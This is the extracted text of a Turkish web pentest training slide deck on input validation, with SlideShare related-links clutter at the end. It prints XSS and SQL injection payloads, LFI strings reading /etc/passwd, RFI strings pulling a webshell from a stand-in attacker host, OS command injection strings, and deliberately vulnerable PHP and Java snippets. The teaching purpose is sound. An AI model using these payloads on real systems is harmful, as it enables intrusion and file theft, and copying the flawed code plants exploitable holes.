SlideShare una empresa de Scribd logo
1 de 102
Descargar para leer sin conexión
Web Uygulama Pentest Eğitimi
Konu: Girdi Denetimi
@2014
Örnek Eğitim Notu
bilgi@bga.com.tr
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Girdi Denetimi
• Uygulama kullanmadan önce bütün güvensiz
verilerin doğru bir şekilde denetlenmesidir.
• Bir çok saldırı çeşidinin temelinde yetersiz girdi
kontrolü vardır;
– Cross Site Scripting
– SQL Injection
– Remote / Local File Inclusion
– ...

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
1. Normalizasyon (Canonicalization)
• Bir dizginin en basit, en temel haline
çevrilmesidir.
• Örnek, aşağıdaki iki yol aynı dosyayı işaret
etmektedir;
/../../etc/passwd
/etc/passwd

• Karmaşık ve kritik bir işlemdir.

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Resultante Importante - URL Kodlama
/index.my?id=prm%2523
browser

v=getParam(“id”)
print v; // prints prm%23

v=URLDecode(v);
print v; // prints prm#

uygulama çatısı

kod

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
2. Beyaz Liste Girdi Denetimi
• Sadece iyi karakter veya karakter dizgilerinin
kabul edilmesidir.
• Güvenli ve tavsiye edilen girdi denetimidir.
• Örnekler;
– Kredi kartı girdi alanının geçerli kredi kartı
numarası olup olmadığının kontrolü
– Eposta adresi girdi alanının geçerli eposta olup
olmadığının kontrolü

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
3. Kara Liste Girdi Denetimi
• Bilinen kötü karakter veya karakter dizgilerinin
reddedilmesidir.
• Çok kullanılan ama güvensiz girdi denetimidir.
• Örnekler;
– <script> geçen girdilerin reddedilmesi
– or 1=1 -- geçen girdilerin reddedilmesi

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
4. Temizleme İşlemi (Sanitize)
• Girdinin kabul edilebilir bir formata
çevrilmesidir.
• Beyaz liste mantığı ile sanitize
– Örn: Telefon numarası içinde geçen sayı, olmayan
karakterlerin silinmesi

• Kara liste mantığı ile sanitize
– Örn: Adres girdisinin içindeki bütün tek tırnak
karakterlerinin silinmesi

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
5. Encoding İşlemi
• Girdi içindeki özel karakterlerin başka bir
formata değiştirilmesidir.
• Amaç, hedef yorumlayıcı için özel karakterlerin
kodlama işlemi sonrası önemlerini yitirmiş
olmalarıdır.
• Örnek;
– HTML kodlama
– URL kodlama

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
6. Escape İşlemi
• Yorumlayıcıya gitmeden gerçekleştirilen
karakter format değişikliğidir.
• Çoğu durumda kodlama ile aynı anlamdadır.
• Örnek;
– Oracle veritabanında çalışacak SQL sorgularında
tek tırnak karakterlerinin iki tek tırnak ile
değiştirilmesiyle, sorgu yapısının değiştirilmesi
engellenebilir.

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Çoğu Zafiyetin Kökeni

Kod

Veri
Kapsam

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Kod ve Verinin Karıştırılması

veri

kod
A = "select * from users where id = "

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Kod ve Verinin Karıştırılması

veri

kod
A = "/opt/myapp/startcmd.sh --str "

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Kod ve Verinin Karıştırılması

veri

kod
A = "Siparişinizin hazırlanma süresi ";
eval(A);
</script>
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS Nedir?
Uygulama

Browser

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Cross Site Scripting - XSS
• Html/dhtml/css veya javascript kodunun
izinsiz olarak kurbanın tarayıcısında
çalıştırılmasıdır.
• Üç genel XSS çeşidi mevcuttur;
– Reflected
– Stored
– DOM Based

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Reflected XSS

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Stored XSS - Senaryo

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
DOM Based XSS - Senaryo

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - MySpace Worm

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - MySpace Worm

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - MySpace Worm

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - MySpace Worm

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - Diğer Wormlar
•
•
•
•
•
•
•
•
•

Orkut
Justin.tv
Yahoo! Mail
Facebook
Twitter
Reddit
Digg
MySpace
…
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - Neden Olduğu Problemler
• Bilgi Hırsızlığı
– Oturum Korsanlığı
– Clipboard Veri Çalma, Tuş Yakalama, Ekran Çalma

•
•
•
•

İçerik Değişikliği (Defacement)
Geçmiş Tarama, Port Tarama
Dahili IP Çalma, Web Spidering, XSS Botnet
Açıklık Tarama, Worm

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - İstatistikler

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - Temel Test Tekniği - Analiz
1. XSS için denetlenecek parametre belirlenir
2. Bu parametreye abcde gibi basit bir değer
verilerek istek yapılır
3. Cevap içerisinde abcde nerelerde geçiyor
hesaplanır.
–
–
–
–

HTML
HTML Attribute
Javascript
URL

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - Temel Test Tekniği - Test
1. Analiz sonucu parametre değeri olarak uygun
payload gönderilir,
2. Cevabın içinde payload aranır,
3. Bulunduğunda sayfa içinde payload uygun
kodlama işleminden geçirilmemiş ise XSS
güvenlik zafiyetinden bahsedilir.

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - Payload 1

<plaintext>

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - Payload 1 - Örnek

1
2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - Payload 2
';prompt(String.fromCharCode(88,83,83))//';
prompt(String.fromCharCode(88,83,83))//";
prompt(String.fromCharCode(88,83,83))//";
prompt(String.fromCharCode(88,83,83))//-></ScRIPT>">'><ScRIPT>
prompt(String.fromCharCode(88,83,83))</ScRI
PT>

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
XSS - Payload 3

'';!--"<abc>=&{()}

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Raw Echo - Payload

1

2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
HTML Attribute - Payload

1

2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
HTML Attribute Interactive - Payload

1

2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Javascript Injection - Payload

1

2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
innerHTML ByPass - Payload

1

2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
CSS – Internet Explorer - Payload

1

2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
DOM Based XSS

Sunucuya giden parametre

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
DOM Based XSS

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
DOM Based XSS

Sunucuya giden parametre yok!

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
DOM Based XSS

Sunucuya giden XSS String yok!

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection Nedir?
• SQL Injection;
– Saldırganlar için en popüler,
– Geliştiriciler için en bilindik,
– İş sahipleri için en tehlikeli

• Hedef veritabanında uygulama yolu ile yetkisiz
olarak sql sorgularının çalıştırılabilmesidir.

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection - Senaryo
Dinamik bir SQL sorgusu

SELECT * FROM users WHERE id=$id;
Normal bir değişken değeri

SELECT * FROM users WHERE id=100
Anormal bir değişken değeri: SQL Enjeksiyonu

SELECT * FROM users WHERE id=100 OR 2>1

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection ile 2012

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection - İstatistikler

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection - İstatistikler

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
SQL Injection Çeşitleri
• Olma şeklinden
– Integer
– String

• Saldırı Perspektifinden
– Kör (Blind)
– Zaman Tabanlı
– Union
– Hata Tabanlı
– Out of Band
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Integer SQL Injection - Test Teknikleri
/urundetay.aspx?id=5

select * from products where id=5
Orijinal Cevap

Ürün Detayı
Led TV

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Integer SQL Injection - Test Teknikleri
/urundetay.aspx?id=5’

select * from products where id=5’

HATA SAYFASI
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Integer SQL Injection - Test Teknikleri
/urundetay.aspx?id=5 waitfor delay ‘00:00:05’ -select * from products where id=5 waitfor delay ‘00:00:05’ --

Orijinal Cevap 5 sn gecikmeli

Ürün Detayı
Led TV

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Integer SQL Injection - Test Teknikleri
/urundetay.aspx?id=5
select * from products where id=5

Orijinal Cevap

Ürün Detayı
Led TV

Orijinal Cevap

/urundetay.aspx?id=5 and 5=5
select * from products where id=5 and 5=5

/urundetay.aspx?id=5 and 5=6

Ürün Detayı
Led TV

HATA SAYFASI

select * from products where id=5 and 5=6
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
String SQL Injection - Test Teknikleri
/goster.do?isim=muro
select * from users where name=‘muro’
Orijinal Cevap

Kullanıcı Detayı
Muro

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
String SQL Injection - Test Teknikleri
/goster.do?isim=muro’
select * from users where name=‘muro’’

HATA SAYFASI
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
String SQL Injection - Test Teknikleri
/goster.do?isim=muro’ and SLEEP(5) %23
select * from users where name=‘muro’ and SLEEP(5) # ’

Orijinal Cevap 5 sn gecikmeli

Kullanıcı Detayı
Muro

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
String SQL Injection - Test Teknikleri
/goster.do?isim=muro
select * from users where name=‘muro’

Orijinal Cevap

Kullanıcı Detayı
Muro

Orijinal Cevap

/goster.do?isim=muro’ and ‘5’=‘5
select * from users where name=‘muro’ and ‘5’=‘5’

/goster.do?isim=muro’ and ‘5’=‘6

Kullanıcı Detayı
Muro

HATA SAYFASI

select * from users where name=‘muro’ and ‘5’=‘6’
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Blind SQL Injection Teori - MySQL
select version()
5.0.51b-community-nt
select mid(version(), 7, 1)
b

select ord(mid(version(), 7, 1))
98

Veritabanı
Versiyonu
Veritabanı
Versiyonunun
Yedinci Karakteri
Versiyonun
Yedinci Karakterinin
ASCII Değeri

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Kör SQL Injection
63
1

127

/urundetay.aspx?id=5 and ord(mid(version(), 7, 1)) > 63
select * from products where id=5 and ord(mid(version(), 7, 1)) > 63
5.0.51b-community-nt

b

98

Orijinal Cevap

Ürün Detayı
Led TV

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Kör SQL Injection
95
63

127

/urundetay.aspx?id=5 and ord(mid(version(), 7, 1)) > 95
select * from products where id=5 and ord(mid(version(), 7, 1)) > 95
5.0.51b-community-nt

b

98

Orijinal Cevap

Ürün Detayı
Led TV

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Kör SQL Injection
111
95

127

/urundetay.aspx?id=5 and ord(mid(version(), 7, 1)) > 111
select * from products where id=5 and ord(mid(version(), 7, 1)) > 111
5.0.51b-community-nt

b

98

HATA SAYFASI
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
MySQL Escape - 
Orijinal

Escaped

NULL

0

"

"

%

%

'

'





_

_

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
MySQL Escape - Hata
$user = "";
if(isset($_GET['user']))
$user = $_GET['user'];
$userEsc = str_replace("'", "''", $user);
$q = "SELECT * FROM users where u = '" . $userEsc . "'";
$result = mysql_query($q);

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Code Injection
• Saldırganın hedef web uygulaması üzerine
zararlı kod veya kod parçacığı eklemesidir.
• Büyük çoğunlukla PHP tabanlı uygulamalar da
bulunsa da JEE/ASP.NET uygulamalarında da
görmek mümkündür.

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
PHP Include
• Karmaşık kodları daha iyi yönetebilmek için
modülariteyi arttırmak amacı ile PHP
çatısında, bir PHP dosyasına başka bir PHP
dosyasının dahil edilmesi özelliği vardır.
• Bu işlem için aşağıdaki fonksiyonlar kullanılır
– include(dosya_ismi)
– require(dosya_ismi)
– include_once(dosya_ismi)
– require_once(dosya_ismi)
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
PHP Include - Örnek
index.php
<html>
<body>
<?php include 'header.php'; ?>
<h1>Merhaba <?php echo $user ?>
Ana sayfaya Hoşgeldiniz...</h1>
...

header.php
<?php
$user = $_SESSION[‘user’];
?>

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
PHP Include - Örnek
index.php
<html>
<body>
<?php
$user = $_SESSION[‘user’];
?>
<h1>Merhaba <?php echo $user ?>
Ana sayfaya Hoşgeldiniz...</h1>
...
header.php dosyası içeriği
kopyalandı ve
index.php dosyasına
yapıştırıldı.

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Code Injection - PHP
• PHP include/require fonksiyonlarına giden
parametre değerleri saldırganlar tarafından
değiştirilebilirse,
• Diğer sistem ve uygulama dosyaları da
çalıştırılacak PHP dosyaları içine kopyalanıp,
saldırgana cevap olarak dönebilir.

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Code Injection - Senaryo
index.php

1
/index.php?lang=tr

sonuç

2

<?php
$language = $_REQUEST[‘lang’];
include($language.”.php”);
…
?>

3
tr.php
<?php
…
?>

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Code Injection - Saldırı - LFI
index.php

1
/index.php?lang=/etc/paswd%00

sonuç

2

<?php
$language = $_REQUEST[‘lang’];
include($language.”.php”);
…
?>

3
/etc/passwd
root::
guvenlikod::
…

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Code Injection - Saldırı - RFI
1

/index.php?lang=http://www.saldirgan.com/webshell.txt?

index.php
sonuç

2

4

www.saldirgan.com

php
web
shell

<?php
$language = $_REQUEST[‘lang’];
include($language.”.php”);
…
?>

3

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Örnek Saldırı String’leri
RFI-Remote File Inclusion: Uzaktan kod çağırma/dosya dahil etme

?id=http://saldirgan.com/myshell.txt%00
?id=http://saldirgan.com/myshell.txt?
LFI-Local File Inclusion: Server içinden kod çağırma/dosya dahil etme

?id=../../../uploads/myshell.txt
?id=../../../uploads/myshell.txt%00
77

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Diğer Denetim Teknikleri

?file=.htaccess
content.php?file=content.php
?file=../../../../../var/log/apache/error.log%00
?file=[http|https|ftp]://saldirgan_sunucu/shell.txt%00
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
?file=http://127.0.0.1/yol/xss.php?param=phpkodu

78

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Fimap ile Otomatik RFI/LFI
• PHP uygulamalarında otomatik RFI ve LFI
bulmak için Python ile yazılmış bir araçtır.
• http://code.google.com/p/fimap/
• >= Python 2.4
• Versiyon alpha_09

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Fimap - Örnek
python >=2.4gereksinimi

python fimap.py
-u http://sunucu/index.php?pg=
-x
Parametreler ile beraber
denetlenecek URL

Başarılı saldırı sonrası
interaktif bir oturum açılması

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
Fimap - Reverse Shell
3
1

2

4

5

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding
• Uygulamalar geliştirilirken işletim sistemi
komutları çalıştırma ihtiyacı olabilir.
– Örn: Popüler komut satırı Unix/Linux/Windows
uygulamalarına web arayüzü yazılması;
• iptables, asterisk, qmail, v.b.

• Yetersiz girdi kontrolü nedeniyle saldırganın
hedef web uygulamasını kullanarak işletim
sisteminde komutlar çalıştırması OS
Commanding olarak adlandırılır.
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Ön Bilgi

KULLANICI

KOMUT SATIRI
İŞLETİM SİSTEMİ
DONANIM

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Unix - Ön Bilgi
ls -al

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Windows - Ön Bilgi
dir .

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Unix - Ön Bilgi
grep com myfile.txt

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Unix - Ön Bilgi
ping www.guvenlikod.com

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Unix -|
ls -al | ping www.guvenlikod.com

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Windows -|
dir C: | ping www.guvenlikod.com

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Unix - ;
ls -al ; ping www.guvenlikod.com

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Windows - &
dir . & ping www.guvenlikod.com

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Unix - ||
ls -al || ping www.guvenlikod.com
1
2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Windows - ||
dir . || ping www.guvenlikod.com
1
2

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Unix - &
ls -al & ping www.guvenlikod.com

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Unix - &&
ls -al && ping www.guvenlikod.com

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Windows - &&
dir . && ping www.guvenlikod.com
1

2
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Tanım
• Uygulamalar geliştirilirken işletim sistemi
komutları çalıştırma ihtiyacı olabilir.
– Örn: Popüler komut satırı Unix/Linux/Windows
uygulamalarına web arayüzü yazılması;
• iptables, asterisk, qmail, v.b.

• Yetersiz girdi kontrolü nedeniyle saldırganın
hedef web uygulamasını kullanarak işletim
sisteminde komutlar çalıştırması OS
Commanding olarak adlandırılır.
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
1. Komut

4. Sayfa + Cevap

UYGULAMA

OS Commanding - Senaryo

2. Komut

3. Cevap

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Xerox WorkCentre

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Xerox WorkCentre
function=HTTP_IP_Restriction_Update&Prot
INPUT
tcp
ACCEPT
ocol=tcp&Action=ACCEPT&Chain=INPUT&Int
erface=eth0&SourceIP=1.2.3.4&Dport=80&S
eth0
1.2.3.4
rcPort=443
iptables -A

-p

-i

-s

-j

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Xerox WorkCentre
function=HTTP_IP_Restriction_Update&Prot
tcp
ACCEPT
ocol=tcp&Action=ACCEPT | ping
www.webguvenligi.org&Chain=INPUT&Interf
www.webguvenligi.org
ace=eth0&SourceIP=1.2.3.4&Dport=80&SrcP
ort=443
iptables -A

-p

-i

-s

-j

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding
public string executeCommand(String hostName) {
try {
String host = hostName;
Runtime rt = Runtime.getRuntime();
rt.exec("cmd.exe /C nslookup " + host);
}
catch(Exception e){
e.printStackTrace();
}
}
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - İstatistikler

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Test Teknikleri

?id=/bin/ls|
?id=; cat /etc/passwd
?id=; cat /../etc/X11/../passwd

Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
OS Commanding - Test Teknikleri

?id=| dir C:

?id=|| dir C:
?id= & dir C:
?id= && dir C:
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr
BGA İletişim
www.bga.com.tr
blog.bga.com.tr
twitter.com/bgasecurity

facebook.com/BGAkademisi

bilgi@bga.com.tr

egitim@bga.com.tr
Web Uygulama Pentest Eğitimi © 2014 |Bilgi Güvenliği AKADEMİSİ | www.bga.com.tr

Más contenido relacionado

La actualidad más candente

Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6BGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15BGA Cyber Security
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıBGA Cyber Security
 
Hacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu AnaliziHacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu AnaliziBGA Cyber Security
 
Caldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuCaldera İle Saldırı Simülasyonu
Caldera İle Saldırı SimülasyonuBGA Cyber Security
 
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziKurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı AnaliziBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3BGA Cyber Security
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber Security
 
Beyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiBeyaz Şapkalı Hacker başlangıç noktası eğitimi
Beyaz Şapkalı Hacker başlangıç noktası eğitimiKurtuluş Karasu
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıBGA Cyber Security
 
BGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA Cyber Security
 
Saldırı Tipleri ve Log Yönetimi
Saldırı Tipleri ve Log YönetimiSaldırı Tipleri ve Log Yönetimi
Saldırı Tipleri ve Log YönetimiOğuzcan Pamuk
 
Yazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriYazılım Güvenliği Temelleri
Yazılım Güvenliği TemelleriBGA Cyber Security
 
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıPenetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıBGA Cyber Security
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziBGA Cyber Security
 

La actualidad más candente (20)

Web uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirmeWeb uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
